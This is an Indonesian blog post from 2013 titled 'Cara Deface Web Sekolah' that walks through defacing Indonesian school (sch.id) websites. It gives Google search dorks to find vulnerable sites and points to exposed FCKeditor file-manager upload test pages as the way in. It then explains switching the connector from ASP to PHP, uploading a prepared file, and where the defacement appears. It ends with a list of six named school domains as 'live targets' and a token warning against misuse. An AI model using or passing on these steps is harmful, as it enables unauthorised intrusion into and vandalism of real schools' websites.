Jumat, 22 Februari 2013

Cara Deface Web Sekolah (Sch.id)





Maaf Kalo Gambarnya kagak nyambung.Kita Awali dengan Niat yang baik.




1. Siapkan file txt di desain yah..:D.






2. Dork:


inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?


3. Exploit:   /editor/filemanager/connectors/test.html
                  /editor/filemanager/connectors/uploadtest.html




*Pakai salah satu Exploitnya*




EX:


http://xxx.sch.id/html/siswa.php
http://xxx.sch.id/html/almni.php
http://xxx.sch.id/html/guru.php


*Sesuai Dork.


Ganti jadi: 

http://xxxx.sch.id/editor/filemanager/connectors/uploadtest.html


4. Ganti ASP jadi PHP.


5. Browse file txt yang sudah disiapkan -> open -> upload.


6. Hasilnya: http://xxx.sch.id/userfiles/file/nama-file.txt


live target :
http://sdia20.sch.id/simk/atk/attributes/fck/editor/filemanager/connectors/test.html
http://www.e-learning.smpbatikska.sch.id/editor/filemanager/connectors/test.html
http://sman1kotabaru.sch.id/editor/filemanager/connectors/test.html
http://smansa-pringsewu.sch.id/editor/filemanager/connectors/test.html
http://www.smkn1kuta.sch.id/editor/filemanager/connectors/test.html
http://smp1ponjong.sch.id/editor/filemanager/connectors/test.html



BloodyTears_Art

Sekian Tutorial dari saya jangan di salah gunakan bro .. . . !!!!

Tidak ada komentar:

Poskan Komentar